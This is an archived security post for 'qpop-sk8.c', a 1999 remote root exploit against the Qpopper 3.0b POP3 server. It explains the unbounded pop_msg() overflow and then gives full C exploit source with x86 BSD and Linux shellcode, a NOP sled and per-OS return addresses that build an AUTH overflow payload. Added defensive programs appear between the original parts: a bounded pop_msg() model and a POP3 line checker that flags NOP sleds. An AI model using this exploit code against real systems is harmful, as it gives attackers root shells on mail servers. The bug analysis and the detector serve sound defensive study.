
qpop-sk8.c

Posted Dec 2, 1999
Authored by sk8 | Site lucid-solutions.com

Qpopper 3.0b remote root exploit, tested on BSDI 3.0/4.0.1, FreeBSD 2.2.8/3.3, and Linux.

tags | exploit, remote, root
systems | linux, freebsd
SHA-256 | 4838a4454622b456ed9380a043cedb9492cba751e4b9545b07c53e94f1ff6336

 Date: Tue Nov 30 1999 01:25:25
Author: Lucid Solutions

I found this overflow myself earlier this month. Seems someone
else recently found it before Qualcomm was able to issue a patch. The 2.x
series is not vulnerable because AUTH is not yet supported and the error
returned by attempting to use AUTH does not call pop_msg() with any user
input.

There is also another overflow besides the AUTH overflow which can
occur if a valid username and password are first entered, also occurring in
pop_msg().
pop_get_subcommand.c contains this line near the bottom in qpopper3.0b20:
pop_msg(p,POP_FAILURE,
"Unknown command: \"%s %s\".",p->pop_command,p->pop_subcommand);

No bounds checking is done on the attempted subcommand. It is
interesting to note that in qpop 2.53, a similar line is used, but with
limits on the string length!
pop_msg(p,POP_FAILURE,
"Unknown command: \"%.128s %.128s\".",p->pop_command,
p->pop_subcommand);


I guess Qualcomm did not continue development of Qpopper directly from the
2.53 series, but rewrote code from scratch and/or based it on earlier
code.

As a solution, pop_msg() should also do bounds checking, and not make the
calling line responsible for it (although that's good practice too).
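As an added illustration, not part of sk8's post and not Qpopper's own source, the C model below contrasts the two message formats quoted above and shows the callee-side bound the paragraph asks for. The reply-buffer size MSG_LEN, the 1000-byte subcommand and the helper names are assumptions made for this example; the page does not state the real buffer size, and the model omits the +OK/-ERR prefix and CRLF that the real pop_msg() would add in front of the caller's text.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Assumed size of pop_msg()'s reply buffer in this model; the real value
 * in qpopper is not stated on this page. */
#define MSG_LEN 1024

/* Length a formatted reply would need (excluding the NUL), computed
 * without writing anything: vsnprintf with a zero-size destination. */
static int reply_needed(const char *fmt, ...)
{
    va_list ap;
    int n;
    va_start(ap, fmt);
    n = vsnprintf(NULL, 0, fmt, ap);
    va_end(ap);
    return n;
}

/* Hardened pop_msg(): the callee bounds the write regardless of the
 * caller's format. Returns 1 if the message had to be truncated, 0 if it fit. */
static int pop_msg_bounded(char *out, size_t outsz, const char *fmt, ...)
{
    va_list ap;
    int n;
    va_start(ap, fmt);
    n = vsnprintf(out, outsz, fmt, ap);
    va_end(ap);
    return n < 0 || (size_t)n >= outsz;
}

/* Bytes needed for the "Unknown command" reply with a constructed
 * 1000-byte subcommand, using the 3.0b20 format (capped == 0) or the
 * 2.53 format with %.128s precision (capped == 1). */
int unknown_command_needed(int capped)
{
    char sub[1001];
    memset(sub, 'A', 1000);          /* constructed oversized subcommand */
    sub[1000] = '\0';
    if (capped)
        return reply_needed("Unknown command: \"%.128s %.128s\".", "AUTH", sub);
    return reply_needed("Unknown command: \"%s %s\".", "AUTH", sub);
}

/* Same oversized reply through the bounded pop_msg(): returns 1 when it
 * was truncated and the buffer is still a NUL-terminated MSG_LEN-1 string. */
int bounded_reply_truncated(void)
{
    char sub[1001], out[MSG_LEN];
    int truncated;
    memset(sub, 'A', 1000);
    sub[1000] = '\0';
    truncated = pop_msg_bounded(out, sizeof out,
                                "Unknown command: \"%s %s\".", "AUTH", sub);
    return truncated && strlen(out) == MSG_LEN - 1;
}

int main(void)
{
    printf("3.0b20 format needs %d bytes (buffer is %d)\n",
           unknown_command_needed(0), MSG_LEN);
    printf("2.53 format needs %d bytes\n", unknown_command_needed(1));
    printf("bounded pop_msg truncates instead of overflowing: %d\n",
           bounded_reply_truncated());
    return 0;
}
```

With a 1000-byte subcommand the unbounded format needs 1025 bytes, past the modelled 1024-byte buffer, while the %.128s format needs 153. The precision caps only protect the call sites that remember them; vsnprintf inside pop_msg() protects every caller, which is the point of the paragraph above.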

Attached is my original exploit that works on *BSD and Linux. (Solaris is
NOT vulnerable to the AUTH overflow). Slight modification is needed on
one line as the comments say. This exploit will actually work on the
majority of machines then. Qualcomm: you have already received my working
xploit with no modification needed.

Let's hope for an official patch soon.


- sk8@lucid-solutions.com
http://www.lucid-solutions.com


/* QPOP version 3.0b20 and lower beta versions REMOTE EXPLOIT
* combination *BSD and Linux
*
* sk8@lucid-solutions.com
* http://www.lucid-solutions.com
*
* I have written this to test and demonstrate vulnerabilities on clients'
* systems only.
*
* !!!!!!!!!!DO NOT distribute!!!!!!!!!!
* (at least not until Qualcomm issues a patch)
*
* You may only use this to test your own system(s).
* I am not responsible for any unauthorized use of this program.
*
* tested on BSDI 3.0/4.0.1, FreeBSD 2.2.8/3.3, Linux
*
* Since popper is usually compiled by the admin, return addresses will vary,
* but I have included common values. You may have to provide an offset
* to get it to work on your system.
*
* I wrote the exploit near the beginning of November 1999, and unlike some
* other exploits I've seen since, this one works even on Linux boxes on which
* inetd was not started from a shell prompt.
*
* One minor change must be made for this to exploit the AUTH overflow.
*
* Usage: If you can't figure out how to use this, you shouldn't
* be in the security business. (try netcat)
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

unsigned int NOP=0x90;

unsigned long offset=0; /* default offset */

/* *BSD x86 execve("/bin/sh") shellcode */
char bsdsc[]=
"\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17"
"\x88\x5e\x1c\x8d\x1e\x89\x5e\x0e\x31\xc0\xb0\x3b\x8d\x7e"
"\x0e\x89\xfa\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89"
"\xcf\xeb\x01\xff\x62\x61\x63\x60\xeb\x1b\xe8\xc9\xff\xff"
"\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb"
"\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa";

/* Linux x86 execve("/bin/sh") shellcode */
char linuxsc[]=
"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
"\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
"\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
"\xff\xff/bin/sh";

/* one entry per target: menu number, description, total payload length,
 * and the guessed return address (where the NOP sled lands on that system) */
struct version {
    int num;
    char* systype;
    int buffer_length;
    long address;
};

struct version verlist[] = {
    {0, "BSDI 2.x/3.x, FreeBSD 2.x", 1001, 0xefbfd56c},
    {1, "BSDI 4.x", 1001, 0x8047564},
    {2, "FreeBSD 3.x", 1001, 0xbfbfd3dc},
    {3, "Linux", 990, 0xbfffd304},
    {0, 0, 0, 0}
};

int main(int argc, char** argv) {
    char* buffer, *shellcode;
    int buflen, i=0, ver, nvers, align=0;
    uint32_t retaddr;   /* 32-bit slot value, even when built on a 64-bit host */

    nvers = sizeof(verlist)/sizeof(verlist[0]) - 1;   /* drop the terminator */

    if (argc < 2) {
        printf("Usage: %s version [offset]\n", argv[0]);
        printf("\nAvailable versions:\n");
        for (i=0; i<nvers; i++) {
            printf(" %d: %s\n", verlist[i].num, verlist[i].systype);
        }
        printf("\n");
        exit(-1);
    }

    ver=atoi(argv[1]);
    if (ver < 0 || ver >= nvers) {   /* an index past the table would read garbage */
        fprintf(stderr, "unknown version %d\n", ver);
        exit(-1);
    }
    if (argc > 2) {
        offset=atoi(argv[2]);
    }
    if (strstr(verlist[ver].systype, "Linux")) {
        shellcode=linuxsc;
        align=2;   /* shifts the return-address slots by two bytes on Linux */
    }
    else shellcode=bsdsc;

    buflen=verlist[ver].buffer_length;
    retaddr=verlist[ver].address;

    /* layout: command word + NOP sled, shellcode at offset 800, then the
     * return address repeated in 4-byte slots up to the two trailing newlines */
    buffer=(char*)malloc(buflen+1);   /* +1 for the NUL that printf() needs */
    memset(buffer, NOP, buflen);
    memcpy(buffer, "AUTH ", 4);
    memcpy(buffer+800, shellcode, strlen(shellcode));
    for (i=800+strlen(shellcode)+align; i< buflen-4; i+=4) {
        *((uint32_t *)&buffer[i])=retaddr+offset;
    }
    buffer[buflen-2]='\n';
    buffer[buflen-1]='\n';
    buffer[buflen]='\0';

    printf("%s\n", buffer);
    return 0;
}
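An added example, not from the original post: because the payload above travels as one POP3 command line, a server-side or sensor check can flag it on shape alone, without any signature for this particular shellcode. The checker and the sample lines below are constructed for this page; the 255-octet command-line limit is the one set by RFC 2449 and the 40-octet argument limit is from RFC 1939, while the 16-byte sled threshold and the flag names are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Alert flags returned by pop3_line_check(). */
#define POP3_LINE_TOO_LONG  0x1  /* over 255 octets incl. CRLF (RFC 2449) */
#define POP3_NON_PRINTABLE  0x2  /* bytes outside 0x20..0x7e before the CRLF */
#define POP3_NOP_SLED       0x4  /* 16+ consecutive 0x90 bytes (assumed threshold) */
#define POP3_ARG_TOO_LONG   0x8  /* an argument over 40 octets (RFC 1939) */

#define POP3_MAX_LINE 255
#define POP3_MAX_ARG  40
#define SLED_MIN      16

/* Inspect one client command line (len bytes; may contain NULs) and return
 * the OR of the flags above; 0 means the line is shaped like a normal command. */
unsigned pop3_line_check(const unsigned char *line, size_t len)
{
    unsigned flags = 0;
    size_t i, body = len, run = 0, arg = 0;

    if (len > POP3_MAX_LINE) flags |= POP3_LINE_TOO_LONG;
    /* do not count a trailing CRLF or bare LF as content */
    if (body && line[body - 1] == '\n') body--;
    if (body && line[body - 1] == '\r') body--;

    for (i = 0; i < body; i++) {
        unsigned char c = line[i];
        if (c < 0x20 || c > 0x7e) flags |= POP3_NON_PRINTABLE;
        run = (c == 0x90) ? run + 1 : 0;            /* length of the current 0x90 run */
        if (run >= SLED_MIN) flags |= POP3_NOP_SLED;
        if (c == ' ') arg = 0;                      /* SPACE separates keyword/arguments */
        else if (++arg > POP3_MAX_ARG) flags |= POP3_ARG_TOO_LONG;
    }
    return flags;
}

/* Constructed line shaped like the payload above: "AUTH " followed by a
 * 0x90 sled, ~1000 bytes, LF-terminated. */
static unsigned char sled_line[1000];

unsigned auth_overflow_line_flags(void)
{
    memset(sled_line, 0x90, sizeof sled_line);
    memcpy(sled_line, "AUTH ", 5);
    sled_line[sizeof sled_line - 1] = '\n';
    return pop3_line_check(sled_line, sizeof sled_line);
}

/* Run the check over three ordinary commands plus the sled line and return
 * how many of the four were flagged. */
int sample_alert_count(void)
{
    static const char *ordinary[] = {
        "USER alice\r\n", "PASS correct horse battery\r\n", "RETR 1\r\n"
    };
    int alerts = 0;
    size_t i;
    for (i = 0; i < 3; i++)
        if (pop3_line_check((const unsigned char *)ordinary[i], strlen(ordinary[i])) != 0)
            alerts++;
    if (auth_overflow_line_flags() != 0) alerts++;
    return alerts;
}

int main(void)
{
    printf("sled line flags: 0x%x\n", auth_overflow_line_flags());
    printf("alerts over sample traffic: %d of 4\n", sample_alert_count());
    return 0;
}
```

The sled line trips all four flags (0xf) while the three ordinary commands trip none; the length and argument checks alone are enough to catch any payload of this shape, and they would also have caught it at the server before pop_msg() ever saw the subcommand.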

